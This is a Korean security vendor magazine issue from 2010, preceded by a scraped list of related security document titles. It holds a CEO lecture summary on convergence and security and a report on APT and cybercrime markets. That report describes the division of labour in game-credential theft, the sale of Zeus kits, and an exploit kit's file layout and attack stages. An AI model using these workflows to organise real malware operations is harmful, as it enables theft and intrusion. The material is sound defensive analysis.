CEO 강연지상중계 변화의중심에서보안을생각하다 /11 변화의중심에서보안을생각하다 지난 9월 29일, 안철수연구소김홍선대표가서강대컴퓨터공학과, 전자공학과학생들을대상으로초청강연을펼쳤다. 이날강연에는공학전공자뿐만아니라인문학, 사회과학전공자들또한다수참여하여 IT와

Similar documents
인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

*2008년1월호진짜

TGDPX white paper

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>


AhnLab_template

Windows 8에서 BioStar 1 설치하기

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

5th-KOR-SANGFOR NGAF(CC)

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

#WI DNS DDoS 공격악성코드분석

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

Microsoft Word - src.doc

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

SIGIL 완벽입문

untitled

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Microsoft PowerPoint - chap01-C언어개요.pptx

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

PowerPoint Template

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

[Brochure] KOR_TunA

wtu05_ÃÖÁ¾

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

Windows 10 General Announcement v1.0-KO

È޴ϵåA4±â¼Û

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

암호내지

RHEV 2.2 인증서 만료 확인 및 갱신

` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

System Recovery 사용자 매뉴얼

SBR-100S User Manual

Cloud Friendly System Architecture

<C0CCC8ADC1F82E687770>

제목 레이아웃

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

Windows Server 2012

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

ActFax 4.31 Local Privilege Escalation Exploit

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

View Licenses and Services (customer)

07_alman.hwp

로거 자료실

AhnLab Smart Defense White Paper

*****

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

<C3E6B3B2B1B3C0B C8A32DC5BEC0E7BFEB28C0DBB0D4292D332E706466>

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

Endpoint Protector - Active Directory Deployment Guide

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 -

PowerPoint Presentation

Network seminar.key

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

08_spam.hwp

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

BEA_WebLogic.hwp

Secure Programming Lecture1 : Introduction

IP 심화 라우팅프로토콜적용시 라우팅테이블에서 이니셜이있는네트워크를설정하는것 : onnected 직접연결된네트워크를의미한다. 그러므로라우팅은 나는이런네트워크와연결되어있다. 를직접연결된라우터들에게알려주는것 1>en 1#conf t 1(config)#router rip 1

Studuino소프트웨어 설치

Microsoft PowerPoint - G3-2-박재우.pptx

PowerPoint Template

1

슬라이드 1

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

메뉴얼41페이지-2

서현수

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

내지(교사용) 4-6부

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo

TTA Journal No.157_서체변경.indd

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

PowerPoint 프레젠테이션

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

Security Trend ASEC Report VOL.56 August, 2014

Art & Technology #5: 3D 프린팅 - Art World | 현대자동차

UDP Flooding Attack 공격과 방어

월간 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Web Scraper in 30 Minutes 강철

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

ISP and CodeVisionAVR C Compiler.hwp

Transcription:

월간安은안철수연구소에서발행하는보안분석정보매거진입니다 SPECIAL REPORT 되돌아보는 7^7 DDos 대란 2010.10/11 O C T O B E R / N O V E M B E R 2 0 1 0 CEO 강연지상중계변화의중심에서보안을생각하다 Special Report 최악의악성코드심층분석및대응방안 1 부고도화된보안위협의생산 APT 2 부악성코드와의끝없는싸움 ARP Spoofing 3 부악성코드의새로운패러다임 Stuxnet 4 부전세계인터넷뱅킹의공포 ZeuS 세미나지상중계 : 보안관제고객세미나빠르게변화하는위협양상, 보안관리자는괴롭다? Solution Review 보안관제서비스의모든것! AhnLab Sefinity 꼼꼼하게뜯어보기 New Product 공공기관보안관리자김과장의고민은? Statistics 2010 년 9 월악성코드관련주요통계 AhnLab's Twitter What s happening? 1

CEO 강연지상중계 변화의중심에서보안을생각하다 2010.10/11 변화의중심에서보안을생각하다 지난 9월 29일, 안철수연구소김홍선대표가서강대컴퓨터공학과, 전자공학과학생들을대상으로초청강연을펼쳤다. 이날강연에는공학전공자뿐만아니라인문학, 사회과학전공자들또한다수참여하여 IT와보안에대한대학생들의관심을엿볼수있었다. ' 컨버전스시대의덕목 ' 이란주제로진행된이날강연은 IT와보안이슈뿐아니라스마트폰, 소셜네트워크등을자세히다루었다. 이글은안철수연구소김홍선대표님의서강대학교강연을지면으로옮긴것입니다. 미래의기술, 예측하기어려워누구나알다시피애플의혁신은가히혁명적이다. 아이폰을필두로한스마트폰보급은페이스북, 트위터등소셜네트워크서비스의활성화를불러왔다. 트위터의 CEO 는 ' 소셜네트워크가아니라인포메이션허브이다 ' 라고트위터에올린바있다. 이에전적으로동의한다. 이제까지는정보의양이많은것이미덕이라고생각했다. 그러나여기에반론을던진게트위터이다. 정보가많지만실제로필요한것은 140 자면충분하다고. 이것이커뮤니케이션패러다임을변화시키고있으며앞으로미디어등에많은영향을발휘할것이다. 커뮤니케이션패러다임의변화는세가지키워드 -스마트폰, 클라우드, 소셜네트워크 -로읽을수있다. 김대표는휴대전화개발에골몰하면서도누구나휴대폰을가지고다니는날이오게될줄은예상못했던과거를떠올리며, 기술이세상을어떻게바꾸어나갈수있는지와그중요성을역설했다. " 혹시집에수도꼭지가몇개나되는지알고있습니까? 70년대만하더라도두세가족이하나의수도를쓰는일이태반이었습니다. 하지만요즘에는사람수보다도많은수도꼭지를사용하고있습니다. 불과한세대만에일어난변화입니다. 우리가살고있는세상은빠르게변화하고있습니다. 변화의소용돌이한가운데에있다고해도과언이아닙니다." 로볼수있다고전하며이런구조에따라일게된대표적인커뮤니케이션의변화로페이스북, 트위터등소셜네트워크서비스 (SNS) 를꼽았다. 복잡해지는보안위협, 입체적대책필요이어서오늘날정보보안의동향과그대책에대한이야기가이어졌다. 인터넷은현대사회의기반인프라이며모든 PC는네트워크로연결되어있다. 인터넷서비스는비약적으로생성되고있으며이와비례하여보안위협또한점차조직화, 범죄화, 입체화, 글로벌화되어가고있다. 그래서보안은지식정보기반사회의핵심이라할수있다. 오늘날의보안은과거의보안과는판이하게달라졌다. 과거의악성코드가호기심및자기과시성을띠고있었다면, 오늘날에는더복잡해지고, 더고도화되고, 배포방법또한다양해져가고있다. 때문에필요한것은보다종합적인위협분석시스템이다. 한달에 100 만개가넘는악성코드샘플을일일이모두 김홍선대표는아이폰으로대표되는스마트폰이가져온혁신과소셜네트워크의확산, 클라우드기반으로의변화와컨버전스의개념을이어설명했다. 아이폰을위시한스마트폰의등장으로휴대폰제조업계의전통적인강자들이고전을면치못하는현상에대해, 이는과거수직적이던산업구조에서수평적구조로의변화 [ 그림 1] 주요 SNS 서비스의특징 2

대책을세워야하는진짜위협은무엇인가? 위협으로인해기업에발생가능한위험은무엇인가? [ 그림 2] 위협 (Threat) vs 위험 (Risk) 들여다보는것은불가능하다. 이제는네트워크에서분석해들어가는클라우드시스템으로처리하게된다. 날로다양해지는복합적인공격에는, 그에걸맞는입체적인대책이필요하다. 김홍선대표는웜, 바이러스, 스파이웨어의제거뿐만아니라네트워크불법접근및 HOSTS 변조의차단, 메모리해킹방지, 안티디버깅, 안티리버싱, 키보드입력보호등다각적이면서도핵심적인대응이요구되고있음을밝혔다. 야기할때예단적속성의 ' 위협 ' 과실제발생할수있는 ' 위험 ( 리스크 )' 을혼용하고있다는것이다. 김대표는해킹이가능하다는사실자체보다는기업및고객의정보가유출되거나 DDoS 공격을받을가능성이있는지의여부, 즉 ' 리스크의측면 ' 에서접근해야하며사용자에게 " 스마트폰은해킹당할수도있다더라 " 는막연한위험성을갖게하기보다는실제발생할수있는 ' 위협 ' 을올바르게인지할수있게해야함을강조했다. 스마트폰보안, 위협과위험구분해야스마트폰의산업구조와이와관련된보안이슈또한중요하게다루어졌다. 김홍선대표는스마트폰의개인정보유출및직접적인금전적손실을가져올수있는구조를설명하며분실, 악성코드감염등으로발생되는개인적손실부터금전적손실, 사업자에대한 DDoS 공격등사회적위협이일어날수있음을시사했다. 기존의시그니처 (signature) 기반의악성코드탐지에, 실제행위를살펴보고악성코드의유무를판별하는행위기반탐지의필요성도다루어졌다. 특히아이폰의경우애플앱스토어에서제공하는애플리케이션만다운로드할수있는정상단말기에서는악성코드작동가능성이매우낮지만안드로이드애플리케이션 (Android Application) 은특별한검증절차가미약하기때문에악의적애플리케이션의예방도중요하다고밝혔다. 이와관련해김홍선대표가특히강조한것은위협 (Threat) 과위험 (Risk) 의구분이었다. 스마트폰의구조상 PC단위에서일어날수있는모든상황이발생할수있음은사실이나사람들은스마트폰과보안을이 컨버전스시대에우리가생각해야하는것들김홍선대표는빠르게변화하는시대에필요한셀프리더십 (Self- Leadership) 에대한메시지도전했다. 기술력과창의력, 지식이새로운비즈니스의핵심자원으로떠오르는산업패러다임의전환시대에서는자신의가치를창출하는사람이되어야한다는것이다. 그러기위해서 ' 자신만의강점을찾을것 ', ' 자기자신에게투자를아끼지말것 ' 등을강조하며기업 CEO 로서뿐아니라인생의선배로서의조언도아끼지않았다. 지금우리는변화의한가운데에서있다. 이는어느한요소의변화가아닌, 사회전체의패러다임이변하고있다는의미다. 변화의소용돌이에서파생되는갖가지사안에알맞게대응하기위해서는 ' 보안 ' 이좀더적극적일필요가있다. 플랫폼에완연히스며듬과동시에투명하고측정가능하며, 신뢰할수있는플랫폼을만드는데온노력을다할필요가있다. 그것이모바일인터넷과컨버전스 ( 융합 ) 의시대를살아가는우리가고려해야할요점이다. 3

SPECIAL REPORT 최악의악성코드심층분석및대응방안 2010. 10/ 11 01 고도화된보안위협의생산, APT 18세기에서 19세기의영국에서는산업계전반에걸친커다란변화와변혁의시기를맞이하게되었으며이시기에발생하였던산업기술의커다란발전은후에영국의경제학자아놀드토인비 (Arnold Toynbe) 에의해산업혁명 (Industrial Revolution) 이라고불리게되었다. 이러한산업혁명에의해전세계적으로산업구조는조직적이고대량생산체계를갖출수있게됨으로써인류는풍요로운문명의발전을이루게되었다. 산업혁명시기에발생하였던일련의기술발전현상들은현재인터넷 (Internet) 을중심으로발생하고있는다양한보안위협들의발생과정들과유사한모습을많이가지고있다. 금전적이윤을목적으로가지고조직적으로자동화된대량생산방식으로만들어지는보안위협들에맞서는정보보호분야에있어서또다른산업혁명의시기로볼수있을것이다. 그러나최근에와서는금전적이윤을목적으로조직적이고자동화된대량생산형태의보안위협들은이제그범위를서서히확장하여또다른영역으로의발전을꾀하고있는실정이다. 이러한새로운형태의보안위협들에대해정보보호분야에서는 APT(Advanced Persistent Threat) 라고언급하고있다. 사이버블랙마켓 (Black Market) 에서발생하는산업혁명 최근인터넷을통해발생하는다양한보안위협들은이미몇년 에걸쳐금전적인이윤을목적으로제작되고있다는것은잘알 려져있는사실이다. 이러한금전적인이윤을획득하는것만을 목적으로하는것에그치지않고발생하는금전적인이윤을극대 화하기위해조직적인움직임까지보이고있으며실제중국언더 그라운드에서제작되는온라인게임사용자정보의탈취를시도 하는악성코드들의경우철저한역할분담형태로제작되고있어 조직적인모습을그대로보이고있다. 그세부적인역할분담형 태를살펴보게되면악성코드를제작하고제작된악성코드를유 포해서악성코드에감염된온라인게임의사용자들의개인정보 수집하고이를다시현금화하는일련의프로세스는단계적으로 철저하게조직적인역할분담형태로구성되어움직이고있다. 이렇게금전적인이윤을극대화하기위해조직적인역할분담형 태로보안위협을생산하는조직들의모습은과거발생하였던일 련의보안위협형태들로구분지었을때다음과같은특징들을 보이고있다. 1. 투자수익율 (ROI, Return of Investment) 중심의자동화된보안위협생산 보안위협을생산하는조직들은금전적인이윤을극대화하기위 한필요성에의해개인적인위협의제작차원에서조직적인역할 분담형태로변하게되었다. 이러한필요성에의해조직적인형 태를가지게되었으므로조직적인차원에서는보안위협의생산 에필요한금전적, 인력적투자는최소화하고생산하는보안위 협들은목적을최대한많이달성하기위해다양한방안들을사용 하고있다. 이러한형태의대표적인사례로악성코드들의대량으 로자동화된생산형태를들수있다. 사이버블랙마켓 악성코드제작자 악성코드판매 사이버마켓 온라인게임계정정보수집가 온라인게임아이템탈취자 온라인게임아이템판매자 온라인게임사용자 웹사이트크래커 웹사이트제공 온라인게임계정정보판매 온라인게임아이템판매 온라인게임아이템판매 [ 그림 1] 중국사이버블랙마켓의조직적인온라인게임개인정보탈취및아이템판매 4

이렇게웹사이트와악성코드가결합된대규모유포방식으로인해악성코드와같은보안위협에더욱많은사람들이단기간에노출되도록함으로써금전적인이윤역시극대화할수있는기회역시더욱커지게되었다. [ 그림 2] 중국사이버마켓에서판매되는온라인게임악성코드자동생성기 2. 다양한보안위협들을동시에생산하여금전적가치극대화 금전적인이윤을목적으로구성된조직들에서는한가지형태의 index.php 다른파일들호출 보안위협만을생산하는것이아니라다양한형태의보안위협들 을복합적으로생산하고있다. 실례로 2010 년 2 월발생한페이스 북 (Facebook) 피싱 (Phishing) 메일의경우, 유포된피싱메일은허 위로제작된피싱웹사이트로연결하게되는데그연결된웹사 1 단계 기본설정지역정보함수정의 geoip.php functions.php expl_ie6_adodb.php 이트에서는백그라운드 (Backgroud) 로사용자모르게원격제어와 개인정보탈취를목적으로제작된악성코드가유포되고있었다. 이러한점은피싱이라는보안위협과함께악성코드라는보안위 2 단계 방문기록공격코드생성 hit.php exploits.php expl_ie6_mdac.php expl_ie6.php expl_ie7.php expl_ie.php 협을동시에제작하여두가지보안위협에모두노출되는기회 를만들게됨으로써해당보안위협들로인해발생할수있는 3 단계 에러페이지생성 404.php expl_o7.php expl_o9.php 금전적인이윤역시극대화하고자하였던시도라고볼수있다. 3. 자동화로생산된보안위협들의웹사이트를중심으로대규모유포 [ 그림 3] 웹익스플로잇툴킷의한종류인 SEO SPLOIT PACK 과자동화된공격구조 금전적인이윤을극대화하기위해서자동으로생산되는보안위 협들을많은사람들이방문하는웹사이트를중심으로대규모로유포할수있는환경을만들수있게되었다. 이렇게보안위협들의대규모유포는자동화된 SQL 인젝션 (Injection) 과같은기법들과함께웹사이트에존재하는취약점을악용함으로써가능해지게되었다. 이러한대규모유포의좋은사례로는 2009 년 5월과 6월에발생하였던검블러 (Gumblar) 와나인볼 (NineBall) 이라명명된대규모웹사이트해킹및악성코드유포를들수가있다. 그와같이명명된대규모로악성코드유포된보안사고는웹익스플로잇툴킷 (Web Exploit Toolkit) 이라는접속하는웹브라우저에존재하는취약점을자동으로악용할수있게해주는공격도구형태로인해대규모유포의가능성을더욱크게만들게되었다. 고도화된보안위협 APT 의발생과특징앞서사이버블랙마켓에서발생하는다양한보안위협들을생산하는조직들이금전적인목적을가지고조직적이고자동화된방식으로보안위협들을대규모유포하는특징들을보이고있는것을언급하였다. 이러한금전적인목적을가진조직들에서생산하는보안위협들은여전히인터넷에서주요한정보보호분야의주제이다. 그러나 2010 년으로넘어오면서정보보호분야는앞서언급하였던금전적인이윤을목적으로하는보안위협들과다른목적과대상으로생산되는새로운형태의보안위협을정의하게되었는데 APT(Advanced Persistent Threat) 가바로그러한형태이다. 5

1. 고도화된보안위협 APT 의의미 APT 라는단어자체는 2010 년에들어새롭게정의된단어와의미는아니며그기원과최초의사용은미국공군사령부로연결된다. 미국공군사령부에서는 2006 년무렵미국국방부및정부기관들과의원활한커뮤니케이션을위해확인된특정보안위협의형태를지칭하는의미로서 APT(Advanced Persistent Threat) 를사용하게되었다. 그이후정보보호분야의민간부분으로넘어오면서 APT 라는용어는미국공군사령부에서사용되었던의미와조금다른형태로의미로해석되고사용하게되었다. APT(Advanced Persistent Threat) 이가지는개별적인단어들의의미와함께현재발생하는보안위협의특성들이합쳐져 2006 년미국공군사령부에서사용하던 APT 의미에서변형된다른의미가성립하게되었다. 이렇게성립된 APT 가가지는의미를요약하여정의해본다면다음과같다고할수있다. 다양한 IT 기술과방식들을이용해조직적으로경제적이거나정치적인목적을위해다양한보안위협들을생산해지속적으로특정대상에게가하는일련의행위 Advanced 사전적인의미로는 ' 앞선 ', ' 고급의 ' 로정의되고있으나 APT 에서 'Advanced' 라는단어는 APT 형태의보안위협을생산하는조직에서사용하는기술적인범위와수준을지칭하는것으로해석할 수있다. APT 형태의보안위협을생산하는조직은특정한목적을수행하기위해보안위협제작에사용되는기술들을한가지에만제한시키는것이아니라광범위하게많은기술들을동시에사용할수있다. 간단한예시로 APT 형태의보안위협을생산하기위해마이크로소프트 (Microsoft) 의윈도우 (Windows) 운영체제를깊이있게분석하여새로운제로데이 (Zero-Day, 0-Day) 취약점을찾아내어악용할수도있으며, 특정조직의내부시스템을장악하기위한목적으로기존보안소프트웨어에서탐지를회피할수있는새로운형태의악성코드를제작하는것을들수가있다. 결국특정목적을달성하기위해보안위협을생산하는조직은 IT 인프라와관련된모든기술들을다양하게사용할수도있다라는의미로해석할수있다. Persistent APT 의두번째단어에해당하는 'Persistent' 는사전적인의미로 ' 영속하는 ', ' 끊임없는 ' 으로정의되어있다. APT 에있어서이 'Persistent' 라는의미는보안위협을생산하는조직이가지고있는특정목적을대하는자세또는공격대상에대한태도로해석할수있다. 이는보안위협을생산하는조직이가지고있는특정목적이달성되기전까지는그공격대상에게끊임없이새로운기술과방식이적용된공격들이지속적으로가해지기때문이다. 이러한특징으로인해 APT 형태의보안위협을논하는정보보호분야에서는이 'Persistent' 적인특성으로인해그보안위협의목표가되는대상에게는치명적인손상을가하게된다고보고있다. Threat APT 에서의미하는 'Threat' 은사전적인의미의 ' 위협 ' 을그대로뜻한다. 그리고여기서이야기하는위협의구체적인형태로는악성코드, 취약점, 해킹과사회공학기법등으로 IT 기술에의해생산되는형태가될수도있으며사람에의해직접적으로만들어지는사회공학기법적인형태가될수도있다. 이렇게 2. APT 형태를가지는보안위협들의공격대상 앞서 APT 가가지고있는개별단어들의사전적인의미와특징들 을통해 APT 가어떠한의미라는것을살펴보았다. 이의미중에 서우리가주의깊게살펴보아야할부분이바로 ' 경제적이거나 정치적인목적 ' 그리고 ' 특정대상 ' 이라는부분이다. 특히앞서정 의한 APT 형태의보안위협에있어그위협의대상은보안위협 을생산해내는조직이가지고있는목적들과밀접한관련이있 으며그목적에따라그대상역시다양하게나타나고있다. 현 재까지발생하였던 APT 형태의보안위협들의공격대상이되었 던대상들을형태별로구분하여살펴보면크게다음 [ 그림 4] 와 같이분류가가능하다. APT 형태의보안위협에대상이되는조 직들은정부기관, 사회기간산업시설, 정보통신기업, 제조업 종기업과금융업종기업들과같은기관과기업들이주요대상 이되고있다. 이러한기관과기업들이 APT 형태의보안위협에 주요대상이된다는점은결국해당보안위협을생산하는조직 들이가지고있는목적자체가정치적인목적이상반되는조직에 정부기관 사회기간산업시설 정보통신기업 제조업종기업 금융업종기업 정부내기밀문서탈취군사기밀문서탈취 [ 그림 4] APT 형태의보안위협에대상이되는조직들 사이버테러리즘활동사회기간산업시스템의동작불능 기업지적자산탈취기업영업비밀탈취 기업지적자산탈취기업영업비밀탈취 사회금융시스템의동작불능기업금융자산정보탈취 6

위험성 취미및장난형태위협 취미와장난을목적으로하는위협 조직범죄형태위협 범죄적인요소포함조직적인구조로위협생산금전적인목적으로위협생산개인정보및금융정보탈취 산업스파이형태위협 경제적인목적으로위협생산지적자산및기업기밀탈취 APT (Advanced Persistent Threat) 지속적이고정교적인타겟공격정부, 기업및정치단체를대상정치적또는경제적목적으로위협생산경제적, 조직적지원을바탕 보안위협의정교함 [ 그림 5] APT 형태의보안위협이가지는정교함과위험성의상관관계 대한정치적인행동또는경제적으로커다란이익을확보할수있는데이터탈취가가능한기업이된다는것을알수있다. 이러한목적들중에서먼저정치적인목적의경우에는일반적으로정부기관과사회기간산업시설이 APT 형태의보안위협에주요공격대상이되고있다. 정부기관을대상으로하는경우에는생산한 APT 형태의보안위협을이용해국가정부기관에서보관중인특정기밀문서를탈취하거나특정정부정책과관련된정보들을확보하기위해서이다. 또한사회기간산업시설을대상으로하는경우에는일종의사이버테러리즘활동으로볼수도있다. 발전소및댐과같이사회운영의근간이되는기간산업시설에대해 APT 형태의보안위협으로공격을가하는것은해당산업시설들의정상적인동작을방해하여해당국가사회전반의정상적인활동이이루어지지않도록하기위해서라고볼수있다. 그리고경제적인목적이되는경우에는일반적인기업들이대상이되고있으며그중에서도소프트웨어나통신장비등을생산하는첨단정보통신기업들과함께자동차, 선박, 가전제품등을생산하는제조업종의기업들도대상이되고있다. 그리고은행, 증권사등금융업종에포함되는기업들도역시 APT 형태의보안위협들의대상이되고있다. 이러한일반적인기업들이대상이되는경우에는일반적으로산업보안 (Industrial Security, Corporate Security) 분야에서언급하고있는주된위협인산업스파이 (Corporate Espionage) 활동의일종으로주로경쟁기업내부의주요소프트웨어소스코드, 제품의설계도등을탈취하여경쟁기업의제품생산과판매에치명적인손상을가해반사적인이익을얻기위한경제적인목적이가장크다고할수있다. 금융업종기업의경우에는경쟁기업의내부재무관련기밀이나비공개투자계획문서등을탈취하여경쟁기업의비즈니스활동전반에걸친타격을주기위한목적도가지고있다. 다. 이러한목적역시시대에따라변하여왔던것을시대에따른공격대상의변화들로미루어알수가있다. 1990 년대에는주로국방부와같은군사기관들이주된대상이되었으며 2000 년대초반에이르러서는주로정부기관들이대상이되었다. 그리고 2000 년대중반에는일반기업들로그범위가확대되었으며그중에서도제조업종에속해있는기업들이주요타깃이었다. 2000 년대후반에이르러서는정보통신기술의발전과함께정보통신기업들이 APT 형태의보안위협에대상이되고있다. 이렇게시대적인상황에따라 APT 형태의보안위협이목표로하는공격대상들역시변화하는특징도있었지만이와함께과거에제작되었던보안위협들과다르게 APT 형태의보안위협에서만볼수있는정교함이존재하고있다. 개별적인보안위협의정교함은해당보안위협이발생하였던시대적인흐름과변화에따라조금씩다르다는특징을가지고있다. 이러한시대적인흐름에맞물리는보안위협의특징은과거에발견되었던보안위협들중에서도악성코드의경우에는대부분이제작자들의개인적인호기심또는자신이가지고있는기술에대한과시를위한성격, 그리고취미생활과같은장난에가까운성격을가지고있었다. 그러므로이러한목적을가지고있는보안위협의형태들은그정교함역시낮으며그로인해발생할수있는위험성역시그리 3. 고도화된보안위협 APT 형태가가지는보안위협적특성 앞서살펴본바와같이 APT 형태를가지는보안위협들의공 격대상들은그위협들을생산하는조직의목적에따라서다르 [ 그림 6] 블랙마켓에서금전거래로판매되는제우스봇생성기 7

[ 그림 7] 오퍼레이션오로라로불렸던보안사고 ( 출처 : McAfee) 높지않다고할수있다. 이러한형태의보안위협들로는 2004 년발견된베이글 (Bagle) 웜과 2006 년발견되었던마이둠 (Mydoom) 웜그리고넷스카이 (Netsky) 웜등을들수가있다. 이중에서도특히마이둠웜과넷스카이웜은제작자간의감정적인싸움으로인해지속적인변형들이제작되기도하였다. 그러나 2000 년에접어들면서금전적인목적으로조직적보안위협을생산하는단계에이르러서는생산되는보안위협들역시그정교함이서서히높아지게되었다. 이러한목적으로제작되는보안위협들은사이버범죄에도해당되지만이와연계되어있는물리적공간에서의조직적범죄에도자리하게되었다. 그리고이러한보안위협들의주된탈취의대상이되는것들은물리적인공간에서현금화가가능하거나재화로서금전적인가치를인정받을수있는온라인게임아이템, 개인신상정보, 금융정보그리고신용카드정보등과같은데이터들이해당된다. 이러한보안위협의형태들중에서가장대표적인사례로는 2008 년말부터제작되기시작하 여 2009 년 6월무렵부터는한국으로도유입되기시작하였던제우스 (Zeus) 봇 (Bot) 을들수가있다. 악성코드생성기와이를조정할수있는 C&C(Command and Control) 서버를설치할수있는제우스패키지는사이버블랙마켓 (Black Market) 에서유료로판매되고있다. 이렇게유료로판매되고있는제우스의패키지를이용하여온라인뱅킹의개인정보들을탈취하여은행계좌가가지고있는금액을모두탈취하거나제우스봇에감염된시스템들의정보들을블랙마켓에유료로재판매하고있다. 